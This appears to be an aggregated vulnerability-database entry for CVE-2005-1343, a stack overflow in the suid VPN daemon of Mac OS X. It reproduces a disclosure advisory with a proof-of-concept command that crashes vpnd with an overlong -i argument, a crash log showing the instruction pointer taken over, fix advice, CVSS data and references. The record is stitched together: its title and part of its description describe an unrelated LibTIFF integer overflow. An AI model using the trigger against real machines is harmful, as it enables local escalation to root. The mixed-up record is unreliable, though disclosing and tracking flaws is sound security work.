ID

VAR-200505-0311


CVE

CVE-2005-1343


TITLE

LibTIFF vulnerable to integer overflow via corrupted directory entry count

Trust: 0.8

sources: CERT/CC: VU#125598

DESCRIPTION

Stack-based buffer overflow in the VPN daemon (vpnd) for Mac OS X before 10.3.9 allows local users to execute arbitrary code via a long -i (Server_id) argument. An integer overflow in LibTIFF may allow a remote attacker to execute arbitrary code. The vulnerability presents itself when the application handles excessive string values supplied through the '-i' command line parameter. An attacker can gain superuser privileges by exploiting this issue. Due to the availability of more information, this issue is being assigned a new BID. This bug can be easily exploited to gain root access. This vulnerability has CVE ID CAN-2005-1343.

Exploitation
------------

The overflow can only be exploited on a system having vpnd configured as a server. The following shows a NON-exploitable vpnd installation:

    host:/tmp root# vpnd -i bla
    2005-05-04 15:12:54 CEST VPND: could not get servers dictionary
    2005-05-04 15:12:54 CEST VPND: error processing prefs file

This is due to the non-existence of /var/db/SystemConfiguration/com.apple.RemoteAccessServers.plist. Anyway, on an exploitable system you'd get:

    host:/tmp root# vpnd -i `perl -e 'print "A"x600'`
    2005-05-04 15:16:41 CEST VPND: Server ID 'AAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' invalid
    Segmentation fault

The crashlog /Library/Logs/CrashReporter/vpnd.crash.log shows:

    OS Version: 10.3.7 (Build 7S215)
    Report Version: 2
    Command: vpnd
    Path: /usr/sbin/vpnd
    Version: ??? (???)
    PID: 12690
    Thread: 0
    Exception: EXC_BAD_ACCESS (0x0001)
    Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
    Thread 0 Crashed:
    PPC Thread State:
    srr0: 0x41414140 srr1: 0x4200f030 vrsave: 0x00000000
    cr: 0x24000242 xer: 0x00000004 lr: 0x41414141 ctr: 0x900010a0
    r0: 0x41414141 r1: 0xbffffbf0 r2: 0xa0192b50 r3: 0xffffffff
    r4: 0x00300950 r5: 0x00402004 r6: 0x00402004 r7: 0x00000001
    r8: 0x0000000f r9: 0xa00011ac r10: 0x00000013 r11: 0x44000244
    r12: 0x900010a0 r13: 0x00000000 r14: 0x00000000 r15: 0x00000000
    r16: 0x00000000 r17: 0x00000000 r18: 0x00000000 r19: 0x00000000
    r20: 0x00000000 r21: 0x00000000 r22: 0x00000000 r23: 0x00000000
    r24: 0x00000000 r25: 0x00000000 r26: 0xbffffce4 r27: 0x00000014
    r28: 0x41414141 r29: 0x41414141 r30: 0x41414141 r31: 0x41414141

Fix
---

Apply Security Update 2005-005 (which fixes quite a few other bugs, too), remove the suid bit or remove the above mentioned config file. More information about said security update can be found at: http://docs.info.apple.com/article.html?artnum=301528

-- Pieter de Boer

Trust: 4.23

sources: NVD: CVE-2005-1343 // CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // BID: 13488 // VULHUB: VHN-12552 // PACKETSTORM: 39081

AFFECTED PRODUCTS

vendor: apple computer | model: - | scope: - | version: -

Trust: 3.2

vendor: red hat | model: - | scope: - | version: -

Trust: 1.6

vendor: apple | model: mac os x server | scope: eq | version: 10.3.9

Trust: 1.6

vendor: apple | model: mac os x | scope: eq | version: 10.3.9

Trust: 1.6

vendor: debian | model: - | scope: - | version: -

Trust: 0.8

vendor: freebsd | model: - | scope: - | version: -

Trust: 0.8

vendor: sun microsystems | model: - | scope: - | version: -

Trust: 0.8

vendor: apple | model: mac os server | scope: eq | version: x10.4.1

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.4

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.9

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.8

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.7

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.6

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.5

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.4

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.3

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.2

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3.1

Trust: 0.3

vendor: apple | model: mac os server | scope: eq | version: x10.3

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.4.1

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.4

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.9

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.8

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.7

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.6

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.5

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.4

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.3

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.2

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3.1

Trust: 0.3

vendor: apple | model: mac os | scope: eq | version: x10.3

Trust: 0.3

sources: CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // BID: 13488 // CNNVD: CNNVD-200505-868 // NVD: CVE-2005-1343

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2005-1343
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#125598
value: 7.75

Trust: 0.8

CARNEGIE MELLON: VU#356070
value: 22.31

Trust: 0.8

CARNEGIE MELLON: VU#539110
value: 5.04

Trust: 0.8

CARNEGIE MELLON: VU#706838
value: 9.38

Trust: 0.8

CNNVD: CNNVD-200505-868
value: HIGH

Trust: 0.6

VULHUB: VHN-12552
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2005-1343
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

VULHUB: VHN-12552
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // VULHUB: VHN-12552 // CNNVD: CNNVD-200505-868 // NVD: CVE-2005-1343

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2005-1343

THREAT TYPE

local

Trust: 0.9

sources: BID: 13488 // CNNVD: CNNVD-200505-868

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-200505-868

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-12552

EXTERNAL IDS

db: CERT/CC | id: VU#706838

Trust: 2.5

db: SECUNIA | id: 15227

Trust: 2.4

db: NVD | id: CVE-2005-1343

Trust: 2.1

db: USCERT | id: TA05-136A

Trust: 1.7

db: SECUNIA | id: 13607

Trust: 1.6

db: CERT/CC | id: VU#125598

Trust: 0.8

db: OSVDB | id: 16084

Trust: 0.8

db: BID | id: 13502

Trust: 0.8

db: CERT/CC | id: VU#356070

Trust: 0.8

db: SECTRACK | id: 1012651

Trust: 0.8

db: CERT/CC | id: VU#539110

Trust: 0.8

db: OSVDB | id: 16085

Trust: 0.8

db: SECTRACK | id: 1013887

Trust: 0.8

db: CNNVD | id: CNNVD-200505-868

Trust: 0.7

db: APPLE | id: APPLE-SA-2005-05-03

Trust: 0.6

db: APPLE | id: APPLE-SA-2005-06-08

Trust: 0.6

db: CERT/CC | id: TA05-136A

Trust: 0.6

db: BID | id: 13488

Trust: 0.3

db: PACKETSTORM | id: 39081

Trust: 0.2

db: VULHUB | id: VHN-12552

Trust: 0.1

sources: CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // VULHUB: VHN-12552 // BID: 13488 // PACKETSTORM: 39081 // CNNVD: CNNVD-200505-868 // NVD: CVE-2005-1343

REFERENCES

url:http://secunia.com/advisories/15227/

Trust: 2.4

url:http://docs.info.apple.com/article.html?artnum=301528

Trust: 1.7

url:http://lists.apple.com/archives/security-announce/2005/may/msg00001.html

Trust: 1.7

url:http://lists.apple.com/archives/security-announce/2005/jun/msg00000.html

Trust: 1.7

url:http://www.us-cert.gov/cas/techalerts/ta05-136a.html

Trust: 1.7

url:http://www.kb.cert.org/vuls/id/706838

Trust: 1.7

url:http://secunia.com/advisories/13607/

Trust: 1.6

url:http://www.idefense.com/application/poi/display?id=174&type=vulnerabilities

Trust: 0.8

url:http://remahl.se/david/vuln/011/

Trust: 0.8

url:http://www.securityfocus.com/bid/13502/

Trust: 0.8

url:http://www.osvdb.org/displayvuln.php?osvdb_id=16084

Trust: 0.8

url:http://securitytracker.com/alerts/2004/dec/1012651.html

Trust: 0.8

url:http://www.idefense.com/application/poi/display?id=173&type=vulnerabilities

Trust: 0.8

url:http://www.idefense.com/application/poi/display?id=240&type=vulnerabilities

Trust: 0.8

url:http://www.securityfocus.org/bid/13488

Trust: 0.8

url:http://www.securitytracker.com/alerts/2005/may/1013887.html

Trust: 0.8

url:http://www.osvdb.org/displayvuln.php?osvdb_id=16085

Trust: 0.8

url:http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=240

Trust: 0.3

url:http://www.apple.com

Trust: 0.3

url: -

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-1343

Trust: 0.1

sources: CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // VULHUB: VHN-12552 // BID: 13488 // PACKETSTORM: 39081 // CNNVD: CNNVD-200505-868 // NVD: CVE-2005-1343

CREDITS

Pieter de Boer pieter@os3.nl

Trust: 0.6

sources: CNNVD: CNNVD-200505-868

SOURCES

db: CERT/CC | id: VU#125598
db: CERT/CC | id: VU#356070
db: CERT/CC | id: VU#539110
db: CERT/CC | id: VU#706838
db: VULHUB | id: VHN-12552
db: BID | id: 13488
db: PACKETSTORM | id: 39081
db: CNNVD | id: CNNVD-200505-868
db: NVD | id: CVE-2005-1343

LAST UPDATE DATE

2025-04-30T21:31:48.159000+00:00


SOURCES UPDATE DATE

db: CERT/CC | id: VU#125598 | date: 2005-05-12T00:00:00
db: CERT/CC | id: VU#356070 | date: 2005-05-16T00:00:00
db: CERT/CC | id: VU#539110 | date: 2005-08-23T00:00:00
db: CERT/CC | id: VU#706838 | date: 2005-05-24T00:00:00
db: VULHUB | id: VHN-12552 | date: 2008-09-05T00:00:00
db: BID | id: 13488 | date: 2009-07-12T14:06:00
db: CNNVD | id: CNNVD-200505-868 | date: 2005-10-20T00:00:00
db: NVD | id: CVE-2005-1343 | date: 2025-04-03T01:03:51.193

SOURCES RELEASE DATE

db: CERT/CC | id: VU#125598 | date: 2005-01-11T00:00:00
db: CERT/CC | id: VU#356070 | date: 2005-05-06T00:00:00
db: CERT/CC | id: VU#539110 | date: 2005-01-20T00:00:00
db: CERT/CC | id: VU#706838 | date: 2005-05-16T00:00:00
db: VULHUB | id: VHN-12552 | date: 2005-05-03T00:00:00
db: BID | id: 13488 | date: 2005-05-03T00:00:00
db: PACKETSTORM | id: 39081 | date: 2005-08-06T06:41:23
db: CNNVD | id: CNNVD-200505-868 | date: 2005-05-03T00:00:00
db: NVD | id: CVE-2005-1343 | date: 2005-05-03T04:00:00